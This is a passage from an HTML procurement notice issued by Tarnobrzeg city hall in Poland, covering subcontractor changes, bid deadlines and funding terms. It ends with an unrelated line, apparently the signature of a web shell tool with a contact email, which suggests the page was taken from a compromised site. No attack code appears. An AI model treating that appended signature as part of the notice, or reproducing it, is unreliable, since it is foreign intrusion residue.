7) zmianie osób, podwykonawców, grup wykonawców i innych podmiotów współpracujących przy realizacji zamówienia pod warunkiem, że ich uprawnienia, potencjał ekonomiczny, wykonawczy i doświadczenie nie są gorsze od tych, jakie posiadają podmioty zamieniane. Zmiany te mogą nastąpić z przyczyn organizacyjnych pod warunkiem, że osoby podwykonawcy, grupy wykonawców i innych podmiotów spełniają wszystkie wymogi wynikające z SIWZ i złożonej oferty.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tarnobrzeg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Tarnobrzega ul. Mickiewicza 7 , 39-400 Tarnobrzeg.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.09.2015 godzina 10:00, miejsce: Kancelarii Ogólnej Urzędu Miasta Tarnobrzega ul. Mickiewicza 7,
39-400 Tarnobrzeg..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com